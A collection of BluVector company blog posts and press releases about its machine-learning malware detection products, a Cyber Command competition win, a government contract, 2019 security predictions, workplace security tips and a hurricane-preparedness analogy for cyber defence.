BluVector Wins U.S. Cyber Command Competition

Company’s AI-powered technology and team tops elite competition by quickly and accurately identifying malware threats

ARLINGTON– July 29, 2019 – BluVector announced today that it won DreamPort’s rapid prototyping event (RPE), in May 2019. Dubbed “RPE-005: The Chameleons and the Snakes,” the competition gave teams a specific detection challenge for a set period of time in a realistic, competitive neutral environment with unclassified sample malware families. DreamPort is a cyber innovation and collaboration center created by U.S. Cyber Command (USCYBERCOM) through a Partnership Intermediary Agreement awarded to the Maryland Innovation and Security Institute (MISI).

This event focused on the introduction and detection of malware signature diversity in a simulated USCYBERCOM cyber battlefield environment. Defender teams competed by creating tools to automate the classification of threats as benign or malicious. After several rounds, BluVector received the best combined performance scores as scored by USCYBERCOM.

BluVector’s next-generation intrusion detection system, powered by its leading-edge machine learning technology, helped the team to identify the file types more accurately than any other competing team. By looking at the content of a file for characteristics that represent good or malicious software, BluVector is able to accurately identify attributes of files designed to perform the functions typical of malware.

“When we’re dealing with malware and its potential to disrupt operations and damage organizations, accuracy and speed matter,” BluVector chief technology officer, Travis Rosiek said. “BluVector has more than a decade invested in our machine learning technology, which is reflected in winning this prestigious challenge.”

BluVector became part of Comcast in March 2019. The company will be showing its BluVector Cortex product at several upcoming events including Black Hat 2019 (August 3-8), DoDIIS (August 18-21), TechNet Augusta (August 19-23) and DSEI 2019 (September 10-13).


Cybersecurity Predictions for 2019

As a cybersecurity company, our employees are always looking ahead to see what’s on the 2019 threat horizon. The great news is that, as we reported regularly on BluVector Threat Report, BluVector continues to use its AI-driven security network knowledge to find new threats without signatures.

Yet, I was curious. So, I decided to ask our leadership about what they’re thinking about in 2019 (you can read Dave Capuano’s comment in Forbes’ 60 Cybersecurity Predictions For 2019). As you can imagine, there’s no simple, single view about what cybersecurity trends or developments will signify the biggest changes in the industry or the challenges that organizations face. Yet, as an AI-driven network security platform company, we know that the powers of machine learning and AI are a growing focal point for companies… and a growing concern as attackers are starting to incorporate these technologies into their attacks (as we talked about in our recent On-Demand Webinar: Weaponizing AI: The Future of Cybersecurity.


"Disinformation and hate speech have outgrown the digital infrastructure’s ability to identify, manage and contain them. As a result, a discussion about the need for a content delivery ecosystem that promotes (and values) 'truth' has gone mainstream. This year, the cold reality will hit us that there really is no single truth; truth has become debatable regardless of the evidence, and determining truth is less about representing facts than about picking sides.

In 2019, I predict that it will become clear that the information and analytics systems that are on the bleeding edge of creating and policing truth – particularly AI-based technologies - are themselves part of the 'bias' problem. This will lead to the start of a fundamental shift in how we think about truth – not in binary terms – but as points on a spectrum, with underlying information systems and analytics systems under fire for their inability to either measure or enforce the integrity of their underlying data sets and analytics methods."

Kris Lovejoy, CEO, BluVector


"In 2019, I predict that organizations will finally realize that reactive cybersecurity doesn’t work anymore. Reactive cybersecurity examples include check the box compliance (which hasn’t evolved in 15 years), an over-reliance on signatures/threat intelligence ("a next generation form of signatures") or waiting to respond to a breach.

I’m hopeful organizations who rely on outdated and reactive approaches to cybersecurity will evolve and incorporate a proactive approach to cybersecurity and mitigating threats. As we've seen over the years, cyber threat actors adapt faster than compliance standards or signatures can be updated. If organizations don’t evolve and become more proactive in their approach to cybersecurity, and cyber adversaries become more destructive and disruptive, I also predict that more and more organizations will be gravely impacted and go out of business."

Travis Rosiek, CTSO, BluVector


"I predict that within the next year we will have the first confirmed use of artificial intelligence/machine learning in the delivery, development or deployment of malware. Today, many in the security industry assume that adversaries will leverage AI/ML to improve their breach success rates and return on investment. We have yet to identify such complexity, however, in the wild. This will change in 2019. Analysts are becoming more aware of the tell-tale signs of the use of AI/ML in how malware is constructed by their creators and what behaviors it performs once deployed."

Dr. Scott Miserendino, VP, Research and Development, BluVector


How to Observe Computer Security Day

Computer Security Day is a time of reflection for both IT teams and their end-users before the holiday-rich month of December begins. It's time to take a few minutes to identify your security risk level and how to minimize it. Here are eight "smack you in the face" considerations that you can use to increase and update your security posture:

  1. Find a security buddy and cube/office swap. You don’t have to officially “buddy up” like summer camp. Instead, find a fellow employee in your department to change cubes or offices to see what potential violations might be easily observed and remediated. Such things might include passwords written on yellow stickies or paper under your keyboard, in your drawer or elsewhere. These make it very easy for unauthorized people to access your computer.
  2. Auto complete passwords become auto enablers. By having all your auto completes set up for all your devices or, especially, secured networks, SharePoint, etc., means that you give nearly open-door access to any person using your computer.
  3. Enable 2FA whenever possible. Sure, this ties your cell number to your work accounts, but this drastically improves the level of security. It also closes the loop on potential unauthorized access from another device.
  4. Get a password storage app. Most people now have a smartphone. There are a wide variety of password apps that can easily help you securely store all your passwords in one place. Yes, this ESPECIALLY includes IT and NOC teams. They’re safe, offer corporate-type levels of encryption, easy to use and with a broad selection of apps, users can find a UI that best suits them.
  5. Watch your company’s security videos. Yes, boring. Yet, it is a good way to rediscover what your corporate compliance rules are, how you’re aligning to them and how you can further increase your company’s security.
  6. Nag your non-secure co-workers. We’re not going to tell you to NARC on your co-workers (that’s #7) but if they’re leaving their computer completely open over the weekend or for long lengths of time, feel free to remind them.
  7. When nagging doesn’t work, report the violation. Let’s face it, corporate access is a privilege and not a right. If a co-worker is acting completely negligent of the rules and increasing the potential for a breach or unauthorized access, reach out to your security team. They can tell you what can be done to alert the user, or they can find another reason to check their access remotely. Often, this can remain an anonymous request.
  8. It’s yours, not your family’s laptop. Your device is often secured to your account and it is yours to secure. If you happen to work over a vacation or somewhere where someone needs your company-sanctioned device, just say no. Since your spouse does not understand the training or rules you’re complying with, why let them use your device. Note: IT teams will treat any violation on your work device as your responsibility. This especially comes into play with children who often don’t fully understand the ramifications of being secure, only to decide to download an old version of Flash so they can play an old browser-based game.

BluVector Wins Multimillion-Dollar Contract with U.S. Government Agency

Company Grows New Annual Contract Value by 130% in 1H 2018

BluVector, a leader in AI-driven network security technology, today announced it has won a multimillion-dollar contract with a U.S. government agency. BluVector is an AI-driven sense and response network security platform that makes it possible to accurately and efficiently detect, analyze and triage sophisticated threats including fileless malware, zero-day malware and ransomware in real time.

As is the case in virtually every industry, government security teams must prepare to face the rapidly increasing volume and sophistication of threats. This problem is made even more difficult by a shortage of trained talent armed with the right capabilities to protect against these emerging threats. The U.S. government has taken the opportunity to confront these challenges head-on, investing in the future through projects focused on artificial intelligence, machine learning and other forward-leaning technologies, such as those deployed by BluVector.

BluVector provides a revolutionary solution to these escalating risks, leveraging supervised machine learning to deliver highly-accurate detection rates of advanced threats in milliseconds. Furthermore, the platform automatically aggregates threat and network data that incident response teams use as context for decision making, shortening the response window and vastly improving analyst efficiency.

"The U.S. government has stated that cyber threats are now the greatest risk to the country," said Kris Lovejoy, CEO, BluVector. "BluVector, born within the defense and intelligence sectors to solve the government’s hardest malware detection challenges, brings over a decade of experience in detecting threats against the government. We're continuing to serve the growing security needs of federal agencies by helping them lower risk, increase compliance and improve threat detection and response capabilities."

BluVector has experienced significant traction in the commercial and public sectors, serving companies ranging from the middle market to some of the largest enterprises and federal agencies in the world. In the first half of 2018, BluVector has already grown its new annual contract value by 130 percent versus all of 2017. These wins have spanned numerous industries, including financial services, healthcare, manufacturing and technology.


When Cyberattacks Act Like Digital Hurricanes

As the United States' East Coast prepares for the impact of hurricane season, we are reminded of the level of preparation that cyber security teams need to go through to protect their networks in the face of a potential disaster.

The sciences of predicting weather and threat intelligence draw many similarities. Just as meteorologists can see a storm brewing and track its initial movements, cyber threat intelligence professionals can often see a threat campaign emerging. Further, the actual path of a storm and its damage is impossible to predict, much like the difficulty in predicting who will be the target of threat campaigns, what tools will be used, or what the impact will be. Like it is for most uncertainties, weather-related or cyber, preparation is key.

Earlier this year, BluVector’s CTO, Travis Rosiek, wrote a piece for Cyber Security: A Peer-Reviewed Journal called "Chief Information Security Officer Best Practices for 2018: Proactive Cyber Security" where he detailed a better approach to cyber security preparedness in the wake of cyber security attacks.  The piece, which you can read the PDF version here, helped us reexamine how security teams build better responses to cyber security disasters. Interestingly, these tactics parallel the preparation we're seeing in anticipation of this season’s hurricanes.

Data: Predicting a hurricane's path is no easy task, so meteorologists leverage a variety of weather models that rely on a massive amount of data to make predictions about how a hurricane will move and grow. These models often use machine learning to adapt models to previously seen hurricanes, improving prediction capabilities over time.

Similarly, with a cyberattack, having as much data as possible about an impending threat early on enables security teams to better understand and prepare for the threat. Solutions that leverage machine learning to learn from the behaviors of past attacks can also help organizations predict and defend against incoming threats, even if they do not exactly match previously seen events.

Target: As we're seeing in areas most likely to be affected by hurricanes this season, a critical first step is physical preparedness. Officials are removing people from high-risk areas and preparing for power outages and food shortages, so as to minimize the impact the storm has on the regions’ most valuable assets: their people.

In the cyber realm, there are numerous ways organizations can prepare for potentially damaging threats. One of the most basic and essential tactics for reducing threat risk, however, is regularly backing up critical data stores. While organizations must also worry about data leaks and not just destruction, this backup process ensures companies can survive most business continuity disruptions caused by cyber threats.

Protection: In a hurricane, sea walls and other tools might reduce the initial surge of a storm, but there's often just no way to stop all the damage. Therefore, areas likely to be impacted must develop a responsive infrastructure in order to stop or reduce the damage, using secondary protection techniques such as effective storm drainage.

In protecting against a cyber-attack, a firewall might hold back the attack's surge, but like a sea wall, it often isn’t sufficient. However, having a secondary level of protection behind that wall can greatly reduce the damage. When organizations take a proactive approach toward addressing these risks, such as by investing in tools specifically designed to pick up on threats that bypass the first layer of defense, they are often able to prevent the damage entirely.

Duration: The winds generated by hurricanes can cause a massive amount of damage during the first few hours or days of the storm. However, it is often the longer-lasting flooding and standing water that cause the greatest amount of long-term damage. Roads, homes, and other infrastructure are no match for this length of abuse.

When it comes to cyber, an initial attack can be devastating, but more often than not, it is threats that have achieved significant dwell time that cause the most damage. Dwell time is calculated as the amount of time a threat remains active within a network or computing device before it is detected. The longer the attack is live within a network, the greater the potential impact due to data exfiltration, lateral movement, or other malicious actions.

Response: Whether in the case of a hurricane or a cyber incident, the response can spell the difference between an inconvenience and a catastrophe. In both scenarios, responders must make split-second decisions with less than perfect information. When it comes to hurricanes, this may entail sending emergency medical resources to one area versus another, without having boots on the ground to provide recon on affected regions.

For cyber incident responders, relevant context and prioritization is absolutely critical to effective response. To gain this context and prioritization, organizations must invest in solutions that correlate detection data with supporting information throughout their environment. With this accurate information, a security organization can rapidly respond to the highest priority threats before damage is done.

Cleanup: After the event has occurred, the critical activity of cleanup begins. This is a time to assess what caused the damage, where the damage happened and where to put any available resources. For those who have experienced hurricanes before, they know this is where leadership matters most. Having the right direction and course of action is crucial to the speed of cleanup and the ability to better prepare for these types of events in the future.

So too is it the case with cyber security, where the head of a security organization must determine how to remediate any damage sustained in a security incident, and what preparations are necessary to protect against the next attack.

Hurricanes have the tendency to be much more dangerous than a cyber event. They put lives at risk, destroy homes and damage physical property. Our thoughts go out to those who have prepared their areas to face these storms, as well as disaster management leaders, first responders and anyone else affected by hurricanes.


BluVector Expands Real-Time Detection of Fileless Malware on the Network

BluVector Demonstrates New Features Extending its Fileless Malware Detection and Response Capabilities at Black Hat 2018

Arlington, Va.— August 2, 2018BluVector, a leader in AI-driven network security technology, today announced the latest version of BluVector® Cortex™, the company’s flagship platform, capable of sensing and responding to the world’s most sophisticated threats in real-time.

This latest upgrade focuses on further innovation within the platform’s network-based fileless malware detection, offering the ability to detect the greatest range of fileless attacks and automatically block these threats through its rich partner ecosystem.

"BluVector Cortex continues to evolve ahead of the industry with the expansion of its real-time detection of zero-day fileless malware on the network, providing the greatest breadth of fileless coverage and the only solution that empowers threat analysts with targeted logging surrounding a fileless event," said Kris Lovejoy, CEO, BluVector. "We're excited to return to Black Hat to show how these new capabilities can help organizations overcome one of the biggest security challenges of 2018 – detecting and responding to fileless malware."

The company also leverages its strong partner alliances, including a partnership with Carbon Black, to offer a unique solution on the market, capable of providing automated protection from fileless malware.

"As cybercriminals continue to evolve, we’ve seen an increase in fileless attacks," said Jim Raine, Director of Technology Alliances, Carbon Black. "By combining BluVector and Carbon Black, customers are able to achieve end-to-end, immediate protection from advanced threats."

Enhancements to BluVector Cortex includes new features that expand detection coverage, improve the investigation and response workflow and further scalability. Major new features and enhancements include:

  • PowerShell Detection – In addition to its existing coverage of JavaScript- and VBScript-based attacks, BluVector now also supports the analysis of PowerShell scripts in network traffic, identifying potential zero-day attacks before they have the chance to cause damage.
  • Fileless Script Capture and Context– Access to the actual scripts and related network traffic from a fileless attack all in one place enables an organization to easily investigate and even reverse-engineer a threat without the need for expensive full packet capture.
  • Advanced Threat Investigation– Today’s threats often make use of multiple stages and threat vectors, which can make investigation a very manual process. Enhanced search capabilities and new filters simplify and automate this correlation process, allowing analysts to quickly understand if an event was a standalone incident or part of a larger attack.
  • 20G Form Factor– Support for very large environments makes BluVector Cortex the only solution capable of detecting never-before-seen file-based and fileless malware in real-time on enterprise- and data center-grade networks.

BluVector will demonstrate its new capabilities at Black Hat USA 2018, Booth #2504, from Aug. 4-9, 2018 at Mandalay Bay in Las Vegas.

You can follow BluVector’s activity at Black Hat on Twitter and LinkedIn.